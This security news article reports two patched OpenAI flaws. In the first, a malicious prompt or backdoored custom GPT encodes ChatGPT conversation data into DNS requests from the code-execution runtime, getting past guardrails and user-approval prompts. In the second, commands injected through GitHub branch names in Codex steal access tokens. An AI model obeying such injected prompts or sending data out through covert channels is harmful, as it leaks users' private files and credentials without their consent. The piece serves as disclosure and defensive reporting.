A previously unknown vulnerability in OpenAI ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point.
"A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content," the cybersecurity company said in a report published today. "A backdoored GPT could abuse the same weakness to obtain access to user data without the user's awareness or consent."
Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that the issue was ever exploited in a malicious context.
While ChatGPT is built with various guardrails to prevent unauthorized data sharing or generate direct outbound network requests, the newly discovered vulnerability bypasses these safeguards entirely by exploiting a side channel originating from the Linux runtime used by the artificial intelligence (AI) agent for code execution and data analysis.
Specifically, it abuses a hidden DNS-based communication path as a "covert transport mechanism" by encoding information into DNS requests to get around visible AI guardrails. What's more, the same hidden communication path could be used to establish remote shell access inside the Linux runtime and achieve command execution.
In the absence of any warning or user approval dialog, the vulnerability creates a security blind spot, with the AI system assuming that the environment was isolated.
As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or improve ChatGPT's performance. The threat gets magnified when the technique is embedded inside custom GPTs, as the malicious logic could be baked into it as opposed to tricking a user into pasting a specially crafted prompt.
"Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation," Check Point explained. "As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user's perspective."
With tools like ChatGPT increasingly embedded in enterprise environments and users uploading highly personal information, vulnerabilities like these underscore the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems.
"This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," Eli Smadja, head of research at Check Point Research, said in a statement shared with The Hacker News.
"As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That's how we move forward safely -- by rethinking security architecture for AI, not reacting to the next incident."
The development comes as threat actors have been observed publishing web browser extensions (or updating existing ones) that engage in the dubious practice of prompt poaching to silently siphon AI chatbot conversations without user consent, highlighting how seemingly harmless add-ons could become a channel for data exfiltration.
"It almost goes without saying that these plugins open the doors to several risks, including identity theft, targeted phishing campaigns, and sensitive data being put up for sale on underground forums," Expel researcher Ben Nahorney said. "In the case of organizations where employees may have unwittingly installed these extensions, they may have exposed intellectual property, customer data, or other confidential information."
Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise
The findings also coincide with the discovery of a critical command injection vulnerability in OpenAI's Codex, a cloud-based software engineering agent, that could have been exploited to steal GitHub credential data and ultimately compromise multiple users interacting with a shared repository.
"The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter," BeyondTrust Phantom Labs researcher Tyler Jespersen said in a report shared with The Hacker News. "This can result in the theft of a victim's GitHub User Access Token – the same token Codex uses to authenticate with GitHub."
The issue, per BeyondTrust, stems from improper input sanitization when processing GitHub branch names during task execution on the cloud. Because of this inadequacy, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent's container, and retrieve sensitive authentication tokens.
"This granted lateral movement and read/write access to a victim's entire codebase," Kinnaird McQuade, chief security architect at BeyondTrust, said in a post on X. It has been patched by OpenAI as of February 5, 2026, after it was reported on December 16, 2025. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension.
The cybersecurity vendor said the branch command injection technique could also be extended to steal GitHub Installation Access tokens and execute bash commands on the code review container whenever @codex is referenced in GitHub.
"With the malicious branch set up, we referenced Codex in a comment on a pull request (PR)," it explained. "Codex then initiated a code review container and created a task against our repository and branch, executing our payload and forwarding the response to our external server."
The research also highlights a growing risk where the privileged access granted to AI coding agents can be weaponized to provide a "scalable attack path" into enterprise systems without triggering traditional security controls.
"As AI agents become more deeply integrated into developer workflows, the security of the containers they run in – and the input they consume – must be treated with the same rigor as any other application security boundary," BeyondTrust said. "The attack surface is expanding, and the security of these environments needs to keep pace."
Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.


